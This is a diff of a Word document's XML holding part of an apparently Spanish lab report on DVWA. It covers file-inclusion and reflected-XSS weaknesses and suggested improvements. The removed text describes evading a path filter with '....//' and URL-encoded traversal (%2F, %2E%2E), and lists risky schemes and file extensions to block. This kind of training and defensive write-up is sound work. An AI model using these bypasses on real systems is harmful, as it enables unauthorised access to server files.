         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>lo cual seri acertado para URLs externas o saneamiento de entradas de usuario. Sin embargo, este filtrado básico podría ser eludido con el uso por el atacante de URLs codificadas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> en la URL, aplicando una forma muy básica de san</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>eamiento y validaciones de entradas,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para prevenir ataques de Cross-Site Scripting (XSS)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; presentando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>varias deficiencias en términos de seguridad y prácticas de codificación.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Un atacante podría usar variaciones como </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"....</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>//"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o codificación URL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, mediante el reemplazo por sus valores ASCII </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>( / -&gt; %2F, .. -&gt; %2E%2E)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, con la finalidad de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>evadir esta protección.</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.2- Vulnerab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ilidad a XSS-Reflected</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de la maquina DVWA</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Como hemos explicando en el punto anterior, el código presenta deficiencias y una capa de seguridad muy básica para la protección de ataques XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>. Si analizamos la web DVWA, al igual que en el nivel bajo al introducir el nombre este aporta el saludo inicial incorporándose al código de la web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -4478,629 +4838,16 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>El script no verifica si el archivo solicitado</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en la entrada </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>está</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">o no </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>en una lista de archivos permitidos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (lista blanca), pudiendo incluir el archivo sin más comprobaciones</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, pudiendo un atacante realizar ataques FLI.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Falta de sa</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">neamiento de la salida y en el manejo de errores, con lo que podría ser vulnerable a ataques XSS con inclusión de código malicioso, y no previene situaciones </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>” except/try”)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>donde el archivo no existe o no es accesible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.3.4.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Recomendaciones de Mejora</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Implementar un rango más amplio de patrones potencialmente malintencionados, como caracteres codificados, esquemas inusuales</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (file:/// </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  http:// o https:// o ftp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>://</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o sftp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>://</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>data:/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> extensiones de archivo sospechosas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (.php o .exe </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .txt o .jpg, y .htaccess o .config) para acceder a archivos del servidor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>La validación debe considerar el contexto en el que se está utilizando la entrada para asegurarse de que se ajuste al formato esperado y no suponga un riesgo para el sistema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
